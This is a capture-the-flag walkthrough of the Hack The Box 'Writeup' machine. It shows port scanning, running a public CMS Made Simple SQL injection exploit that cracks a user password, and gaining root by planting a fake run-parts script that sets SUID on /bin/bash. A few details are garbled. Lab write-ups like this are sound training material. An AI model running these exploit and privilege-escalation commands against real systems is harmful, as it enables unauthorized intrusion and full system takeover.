Release: 06-08-2019

First of all, we need to enumerate and scan the opened ports. Follow the steps bellow:

  1. Make new dirs for a full and detailed port scan output files. It's a good pratice organize the files the most as possible.
  2. Now, we run a non deep nmap scan command (first 1000 ports), just to list the opened ports.
  3. Move the output files to "nmap_full" dir.
  4. With the last nmap output results, we need rescans the specifics ports with a deep scan, to enumerate services.
  5. Move the output files to "nmap_ports" dir.
TIP: If the listed open ports wasn't returned any information about exploit/vulnerability/payload, try to run a deep scan with nmap using de -p- option, maybe there are high ports opened that wasn't listed before: #nmap -sV -p- -v -oA nmap

Check the commands used for the initial enumeration:


kali@kali: ~/htb/writeup/ # mkdir nmap_full ; mkdir nmap_ports/
kali@kali: ~/htb/writeup/ # nmap -Pn -n -v -oA nmap/
kali@kali: ~/htb/writeup/ # mv nmap.* ./nmap_full/
kali@kali: ~/htb/writeup/ # nmap -sV -p22,80 -v -oA nmap
kali@kali: ~/htb/writeup/ # mv nmap.* ./nmap_ports/
kali@kali: ~/htb/writeup/ # cat ./nmap_ports/nmap.nmap
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
kali@kali: ~/htb/writeup/ #

As we have a open port 80, let's check what service/website is hosted in it.

  1. As most of hack the box machines, is a good pratice edit the /etc/hosts file, to point the IP to writeup.htb domain. # echo "\twriteup.htb" >> /etc/hosts
  2. After edit the hosts, we can access the link provided in the 80 port website. Let's enumerate those page/sub-pages.
  3. There are some default files/dirs que can always enumerate in a website. But we dont have time to do one by one, so let's dirb the host. Remember to save the output for future use: $ dirb http://writeup.htb/ /usr/share/wordlists/dirb/common.txt > dirb.txt
  4. With dirb results, we have a robots.txt in the website root path: http://writeup.htb/robots.txt, with a Disalow Role to "writeup" subdir.
  5. Now, we access this subdir in http://writeup.htb/writeup/, and use the extension Whappalyzer in GUI, or in CLI mode, we can use the command whatweb like that: # whatweb http://writeup.htb/writeup/

We need to get a shell access, so lets check some interesting points and find how to exploit it.

  1. Enumerating Whappalyzer/WhatWeb, we get a "CMS Made Simple" framework. Let's search for a exploit: # searchsploit "CMS Made Simple"
  2. In the results, wwe'll find "CMS Made Simple" exploit with SQL Injection. Exploit in: https://www.exploit-db.com/exploits/46635
  3. Running the exploit: # ./exploit.py -u --crack --wordlist /usr/share/wordlists/rockyou.txt
  4. As the exploit documentation said, its time based exploit, so we need to change the var TIME. Tried with 1, no results, tried with 2, no results. TIME=3, take more time to resolve the password salt, and after that, the user field shows the same user (jkr) from the index page. We are on the way...
  5. the exploit finished, and returned that: Salt for password found: 5a599ef579066807 | Username found: jkr | Email found: jkr@writeup.htb | Password found: 62def4866937f08cc13bab43bb14e6f7 | Password cracked: raykayjay9

Cathing the user flag:

  • Connect to host via SSH: # ssh jkr@writeup.htb
  • Type the password: raykayjay9
  • Checking the user with $ whoami
  • Checking the user UID, GID and groups: $ id
  • Listing current directory with $ ls
  • Show user.txt content with $ cat user.txt

We have access to the user shell and we already got the user flag. But we still need to gain root access to catch the root flag.

  1. For the usual enumeration, we used to list the directories, searching for interesting files and folders, that could help us to gain any type of access. I suggest start allways with /etc/, /usr/, /opt/, /tmp, because usually we have info there, we just need to check if the current user have access to read/edit them.
  2. At /usr/local, we can find writable dirs/subdirs to group "staff", that the current user(jkr) is setted too.
  3. At /etc/crontab, we can find some rules pointingo to /bin/run-parts
  4. the last importante enumeration, is from ENV $PATH var, that we have: /etc/crontab

That way, we can bypass the "run-parts" path to a custom script in /usr/local/bin/run-parts

Preparing the spawn shell permission:

  • Now we write a script to change the permission from /bin/bash run with owner permission: $ echo -e '#!/bin/bash\n\nchmod +s /bin/bash' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts
  • Now we open another terminal and log again with ssh. This file runs at every login session.>
  • Spwan the sheel with permission: /bin/bash -p
  • Now, we have root access!

Cathing the flag!

  • Checking the user with $ whoami
  • Checking the user UID, GID and groups: $ id
  • Listing current directory with $ ls
  • Show user.txt content with $ cat user.txt